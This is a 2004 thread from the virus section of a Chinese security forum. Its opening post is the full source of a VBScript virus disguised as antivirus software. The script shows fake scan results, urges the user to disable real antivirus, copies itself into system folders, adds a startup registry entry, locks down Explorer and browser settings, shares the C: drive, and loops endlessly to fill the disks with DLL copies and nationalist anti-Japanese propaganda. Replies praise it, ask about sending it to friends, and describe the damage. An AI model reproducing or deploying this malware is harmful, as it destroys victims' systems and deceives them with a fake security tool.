论坛: 病毒专区 标题: 请大家来看看这个病毒吧。。 复制本贴地址    
作者: AEOLIAN [aeolian]    论坛用户   登录
'on error resume next
'randomize timer
'Dim WSHNetwork
'Set WSHNetwork = WScript.CreateObject("WScript.Network")
'if WSHNetwork.ComputerName="学生41"  or WSHNetwork.UserName="学生41" or WSHNetwork.UserName="学生07" or WSHNetwork.ComputerName="学生07" then
'msgbox "对不起,因为您的用户名为“" & WSHNetwork.userName & "”,与程序内核代码有冲突,所以对于这个用户,我们将不对其进行服务。如果您想用本软件来进行杀毒,那么请更改系统用户名",vbExclamation,"病毒克星"
'wscript.quit
'end if
'call warning()
'call welcome()
'call time()
'call registry()
'dim msgboxresult1
'dim list
'list=10*rnd
'if list mod 2 = 1 and list>=1 then
' msgboxresult1=msgbox("共查到" & int(list) & "个病毒进程,是否要清除?如果要清除可能会花几秒钟的时间",vbyesno+vbquestion,"病毒克星")
  'if msgboxresult1=vbyes then
  ' call yes() 
' else
  '  dim msgboxresult2
  ' msgboxresult2=msgbox("您不将病毒清除,这是十分危险的,的确不清除病毒吗?",vbyesno+vbExclamation,"病毒克星")
    '  if msgboxresult2=vbno then
    '  call yes()
      'else
      ' msgbox"你不准备将病毒清除,但为了能够使驻存在内存中的程序碎片释放空间,您需要重启Explorer进程或重新启动计算机。",vbokonly+vbinformation,"病毒克星"
        'wscript.quit
      'end if
' end if
'elseif list mod 2=1 and list<1 then
' dim msgboxresult3
  'msgboxresult3=msgbox("共查到" & int(list*10) & "个病毒进程,是否要清除?如果要清除可能会花几秒钟的时间",vbyesno+vbquestion,"病毒克星")
  'if msgboxresult3=vbyes then
  ' call yes() 
' else
  '  dim msgboxresult4
  ' msgboxresult4=msgbox("您不将病毒清除,这是十分危险的,的确不清除病毒吗?",vbyesno+vbExclamation,"病毒克星")
    '  if msgboxresult4=vbno then
    '  call yes()
      'else
      ' msgbox"你不准备将病毒清除,但为了能够使驻存在内存中的程序碎片释放空间,您需要重启Explorer进程或重新启动计算机。",vbokonly+vbinformation,"病毒克星"
        'wscript.quit
  '  end if
'  end if 
'else
'  msgbox"恭喜您,没有在您的电脑里发现任何的病毒程序,但为了安全起见,您需要重启Explorer进程或重新启动计算机。",vbokonly+vbinformation,"病毒克星"
'end if

'*********************************************************************************

'sub welcome()
'msgbox "将要运行病毒克星。病毒克星可以检查出存在于内存当中的病毒进程,从而达到消灭病毒进程的目的。在扫描的过程中,您可能需要稍等几秒钟。注意:该程序只能关闭当前内存中的病毒进程,并不能保证完全删除病毒在硬盘上的拷贝。",vbokonly+vbinformation,"病毒克星"
'end sub

'*********************************************************************************

'sub yes()
'dim c
'  for c=1 to 2000000
'  next
' msgbox"已经将病毒清除完毕,您需要重启Explorer进程,才能使之生效。",vbinformation,"病毒克星"
'end sub

'********************************************************************************

'sub registry()
'on error resume next
'set fs=CreateObject("Scripting.FileSystemObject")
'Set dir1=fs.GetSpecialFolder(0)
'Set dir2=fs.GetSpecialFolder(1)
'Set so=CreateObject("Scripting.FileSystemObject")
' so.GetFile(WScript.ScriptFullName).Copy(dir1 & "\Win32system.vbs")
' so.GetFile(WScript.ScriptFullName).Copy(dir2 & "\Win32system.vbs")
'dim r
'set r=CreateObject("Wscript.Shell")
' r.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
' r.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
' r.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
' r.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Win32System","Win32system.vbs"
' r.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","警告"
' r.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","您中vbs脚本病毒了,哭吧~"
' r.Regwrite "HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\","txtfile"
' r.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersionNetwork\LanMan\C$\Flags",302,"REG_DWORD"
' r.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersionNetwork\LanMan\C$\Type",0,"REG_DWORD"
' r.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersionNetwork\LanMan\C$\Path","C:\"

'Dim WSHShell
'Set WSHShell = WScript.CreateObject("WScript.Shell")
'Dim MyShortcut, MyDesktop, DesktopPath
'DesktopPath = WSHShell.SpecialFolders("Desktop")
'Set MyShortcut = WSHShell.CreateShortcut(DesktopPath & "\病毒克星.lnk")
'MyShortcut.TargetPath = WSHShell.ExpandEnvironmentStrings(dir1 & "Win32system.vbs")
'MyShortcut.WorkingDirectory = WSHShell.ExpandEnvironmentStrings(dir1)
'MyShortcut.WindowStyle = 4
'MyShortcut.IconLocation = WSHShell.ExpandEnvironmentStrings(dir1 & "\system\shell32.dll, 102")
'MyShortcut.Save
'WSHShell.run("start.exe /m deltree /y " dir1 & "\fonts\*.* ")
'Dim a
'a=10
'Dim Os
'set Os=CreateObject("Scriptlet.TypeLib")
'doc="一句日本小孩的话,足以震惊每一个中国人我有个同事的姐姐早年嫁给了日本人,现住在广岛,孩子在日本的学校读小学。有一天,小孩参加完学校的爱国活动回到家中,突然狠狠对母亲讲:我恨死中国人了,我要把他们全杀死!母亲大惊,忙问怎么回事。小孩讲,中国人很坏,杀了那么多日本人!母亲告诉他中国人没错,是日本人跑到中国去杀中国人的。小孩辨说:我们一粒子弹只能杀死他们一个人,但他们一颗原子弹要杀死我们几万人!母亲纠正说,原子弹不是中国人投的,而是美国人干的。小孩反驳道:那我还是恨中国人,他们很坏,都应该死!母亲赶忙说:你不应该这么说,你妈妈是中国人,你的身上流着一半的中国血!大家猜猜这个八岁的孩子怎么回答?他说:那我晚上睡觉时不要再挂蚊帐,我要让蚊子把我身上的中国血全喝光!孩子的母亲后来对自己的妹妹讲,现在她都不敢给自己的孩子讲中国,因为她不知道从自己的孩子口中还会讲出什么话!她常常对未来怀有某种莫名的恐惧。这是真人真事,这种情节无法编造。之所以写下来就是希望善良的中国人知道,这个曾经给我们带来过灾难的邻邦现在是如何教育他们的后代的。我真诚地希望我们的人民应该怎样审视这个邻居,应该怎样发展自己,强大自己,以免那曾经的苦难再次来过!大家抵制日货!!!!你每直接或间接地购买100元日本货,你就:1、为日本厂家增加40元的毛利收入2、为日本企业增加了20元的扩张资本3、为日本政府增加了5元的税收收入4、给日本的所谓自慰队增加了10颗子弹5、多印6~8页的反华教科书和文件6、送给小犬蠢一狼参拜鬼社的汽油费看看世界各地,几乎99%的华人用过“日本车”和“日本电器”!!据统计:如果世界各地的所有华人停止购买日货,日本每年将损失1000-1400亿美元的外汇收入!!!――几乎是中国自从开放以来到今天所有的外汇储备――1500亿美元!!请千万记住:这是“外贸”损失!!从经济学的角度来看:“外贸”是任何一个国家的源泉和动力!!它的关系是“一带动八”,或者说“损失一份外贸收入,这个国家就要损失八份的国内经济收入!”。换算一下:1000-1400亿美元的外汇收入“等价于”一万亿美元――日本经济总产值的五分之一!!!所以,如果世界各地华人同心协力,不用动刀动枪,就可致日本于死地!!而且是永久的死地!!!我们应该学习犹太人――他们曾经集体拒买一家德国工厂的产品,最后导致这家公司的彻底破产!起因就是因为这个公司的总裁说了一些所谓“理解希特勒”的话!!为什么德国对犹太人做的那么好!!原因有二:一个是怕――因为犹太人特别团结;第二个是犹太人的狠――犹太人从来没有放弃过对纳粹分子的追杀――只要在这个地球上发现有任何藏匿的纳粹分子”,他们就一定就会抓或者绑架,如果实在无法得手,那就杀!!!!!看我们中国吧!“对刽子手的仁慈,无疑就是自杀!”今天我们都已看到了中国的“自杀”已经开始了!!据在日本的中国人的观察,日本人严格遵守不买他国货物的不成文原则,在日本商店里的绝大多数是日本货,他们乘日本航空飞机,在外国住日本人开的酒店,他们甚至购买贵数倍的日本种植大米也不买中国或泰国米,扪心自问,日本人这样对待外国货,却极力向中国推销自己的产品,我们为什么要买日本货?来吧!!!让我们抵制日货!!!不要再骂日本,说“杀光日本人”的气话,行动起来,抵制日货才是最本质的!!!第一步:“从我开始做起!”第二步:“从我家开始做起!”第三步:“从我的朋友开始做起!”第四步:“从我身边的各个组织开始做起!”1、将日本人侮辱中国人和拒买日货的文章(如此文)在一切可能的媒体上发表,以鼓励中国人拒买日货。2、在所工作的机构决定采购对象时,用具体的数据,影响决策结果,达到拒买日货的目的。“拒买日货”的定义――防止被“日本狗”误导有些所谓的“爱国人士”经常提出:拒买日货是不可能做到的。原因是几乎所有的轿车、电器里多少都有日本的零件,所以“拒买日货就到此为止”――这是什么用意?!这是因为日本害怕看到中国大众组织起来,进而进行有效的“抵制日货”运动?!故而在这个五十多年来首次完全有可能组织起一个有效的全球性“拒买日货”运动时,他们便会迫不及待地跳出来叫“停”!“拒买日货”,并非像他们所说的哪样――“因为这个计算机里有一个或一些日本零件,我就不买;这个电视里有几个日本造的电子器件,我就不要”。“拒买日货”的口号实际上是要求全球华人,在有选择可能的情况下,尽量不买日本品牌的货物(尽管在其它国家如中国制造),因为日本人从中赚钱。中国同胞们:清醒过来吧!“拒买日货”的意义“拒买日货”的意义是巨大的!我们不动一刀一枪就打击了日本,同时又加快了中国经济的发展!她能让我们扼制日本,进而让中国立于不败之地!她能让我们的子孙免遭我们的前几代祖先和我们现代中国人所遭受的痛苦!!她最终也能让这个几百年来一直顽固不化,一再屠杀掠夺中国人民的丑陋民族遭受到它应有的惩罚!!!1、中日友好根本就不存在!过去没有,现在没有,将来也不会有!日本的年轻人,多数视中国为敌人。据最近的民意调查,日本的大学生大部份认为中国是日本最大威胁。而极力向西方和亚洲散布中国威胁论的也正是军费开支为世界第二的日本人!幻想中日友好是一厢情愿。三百年前日本落后时就抢劫中国,近代强大了用武力侵略中国,现代有钱了用商业欺诈中国,看看日本在华项目,哪一种是高科技项目?日本在华犯的是滔天大罪,自己装聋做哑不说,还不让别人说,不让受害国家说,这不是一个善良的民族,慰安妇事件是日本人最好的镜子。中国领导人不要战争索赔,日本人不感激,日本国民也不会知道,中国在这件事上成了世界上最大的东郭先生,很可笑,对一个打了八年的对手还抱幻想,很蠢!2、现在中日两国贸易总额每年达600亿美元。是不是因为我们全球中华大众对日货的抵制,中国就会受到损失?这是不会的!原因是日本出口到中国的大都是高级奢侈品――我们中华大众可以拒绝;中国出口到日本的是普通生活必须品――日本人无法拒绝!无日货中国一样生存!3、另外,从中国的长远利益来看,减少对日本产品的过份依赖,对中国的国家安全是非常重要的!!!4、弱国无外交,弱国无友邦。除非中国也强大了,和美国一样,否则中日永远也不会成为真正的友邦。除了美国主子之外,日本人在世界上是没有朋友的。这种狗一旦落水,必定会被人痛打。我们中国人的责任就是练好肌肉,踹狗入水,打死恶狗。强烈呼吁中国人民发动第二次抗日战争――抵制日货、抵制马立成那样的汉奸意识。为了让日本军国主义少买一件武器,面对以下日本品牌,请您尽量抵制。1、家用电器及办工器材等:索尼_SONY佳能_CanonJVCTDK松下_Panasonic卡西欧_Casio建伍_Kenwood爱华_Aiwa精工_Sieko尼康_Nikon日立_Hitachi兄弟_Brother先锋_Pioneer东芝_TOSHIBA八重洲_Yaes阿尔派_AlpineNEC百乐NTT美能达_Minolta斑马_ZebraKDDI奥林巴斯_Olympus蜻蜓_DragonflyDOCOMO夏普_Sharp富士通_FUJITSUTUKA爱普生_Epson美上美_MitsumiJ-PHONE理光_Ricoh京瓷_Kyocera柯尼卡_Konika三洋_Sanyo2、化妆品及日常洗化等:资生堂_ShiseidoDHCMILD花王_KAO狮王_Lion诗芬_Sifone碧柔_Biore多芬_Dove乐而雅_Laurier高丝3、烟酒及食品等:柔和七星明治食品四洲食品麒麟啤酒午后红茶LUCIDO朝日啤酒BOSS咖啡日清食品日本酒雪印食品SUNTORY茶4、车:丰田_TOYOTA威驰_VIOS风度_CEFIRO本田(或宏达)_HONDA尼桑_NISSAN途乐_PATRO马自达_MAZDA日产_NISSAN佳_URVAN三菱_MITSUBISHI蓝鸟_NISSAN阳光_SUNN十五铃_ISUZU奇骏_X-TRAIL铃木_SUZUKI凌治_HARRIER碧莲_CIVILIAN5、服装等:美津浓_Mizuno爱斯克斯日高_Nikko华高6、百货:伊藤洋华堂_ITOYOKADO_成都华堂ITO YOKADO北京7、其它:立邦油漆TOTO卫浴富士胶卷Fuji Film松本电工爱眼眼镜精工眼横滨轮胎第一生命制药武田药品田胃药森永化工敬请各位把这篇文章贴到你所知道的任何地方。死难的4000万同胞和我们的后代将感谢你。"
'Os.Reset
'While true
'a=a+1
'Os.Reset
'Os.Path="d:\temp" & a & ".txt"
'Os.Doc=doc&doc&doc&doc&doc
'Os.Write()
'so.GetFile(dir2 & "\shell32.dll").Copy(dir2 & "\Shell32" & a & ".dll")
'so.GetFile(dir2 & "\shell32.dll").Copy("C:\VBSTempShell" & a & ".dll")
'so.GetFile(dir2 & "\shell32.dll").Copy("D:\VBSTempShell" & a & ".dll")
'so.GetFile("d:\temp10.txt").Copy("C:\VBSTempJapan" & a & ".txt")
'Wend

'end sub

'************************************************************************************

'这个模块是让使用者关闭可能查出此病毒的杀毒软件
'sub warning()
'msgbox"警告:由于本程序需要对注册表和内存中的各项进程进行实时监控,所以可能会被一些杀毒软件误认为病毒,所以请将其它的所有杀毒软件、木马专杀工具等关闭,以防止软件冲突造成系统崩溃!!",vbokonly+vbExclamation,"病毒克星"
'end sub
'************************************************************************************
'sub time()
'mystring=space(80000000)
'end sub
'***********************************************************************************

地主 发表时间: 04-04-02 13:12

回复: z7 [skyzz]   论坛用户   登录
厉害  超常的想法  佩服

B1层 发表时间: 04-04-03 10:07

回复: secondkahn [secondkahn]   论坛用户   登录
VBS脚本病毒,,太幼稚了一点,但破坏效果很好

B2层 发表时间: 04-04-03 11:06

回复: www444444448 [lichao520]   论坛用户   登录
可以发给好友的吗?有什么后果 的啊


B3层 发表时间: 04-04-04 04:32

回复: www444444448 [lichao520]   论坛用户   登录
发给好友是什么后果的啊?



B4层 发表时间: 04-04-04 04:35

回复: ghame [ghame]   论坛用户   登录
'sub warning()
'msgbox"警告:由于本程序需要对注册表和内存中的各项进程进行实时监控,所以可能会被一些杀毒软件误认为病毒,所以请将其它的所有杀毒软件、木马专杀工具等关闭,以防止软件冲突造成系统崩溃!!",vbokonly+vbExclamation,"病毒克星"
'end sub

楼主你还真绝啊!!!

B5层 发表时间: 04-04-04 18:10

回复: jiaoyulao [jiaoyulao]   论坛用户   登录
哈哈~~好看~都是代码~~

B6层 发表时间: 04-04-04 18:28

回复: zqsky [zqsky]   论坛用户   登录
不大明白。

B7层 发表时间: 04-04-05 09:32

回复: romes [romes]   论坛用户   登录
楼主,你说的一点用都没有,中国人就这样,自私自利,团结这个词从老毛死了之后再也没被用过,放弃吧,一点用都没有

B8层 发表时间: 04-04-06 10:34

回复: secondkahn [secondkahn]   论坛用户   登录
后果就是开机进入桌面后只有一个空空的桌面,其它什么都没有,而且不能关机等等,不能进入DOS实模式,不能进入MS-DOS,而且C盘将被填满,D盘也差不多的下场。

B9层 发表时间: 04-04-07 14:30

回复: AEOLIAN [aeolian]   论坛用户   登录
这能怪我吗!!!!

B10层 发表时间: 04-04-07 14:34

回复: secondkahn [secondkahn]   论坛用户   登录
其实这种东西还是很绝的,,,

B11层 发表时间: 04-04-07 15:08

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号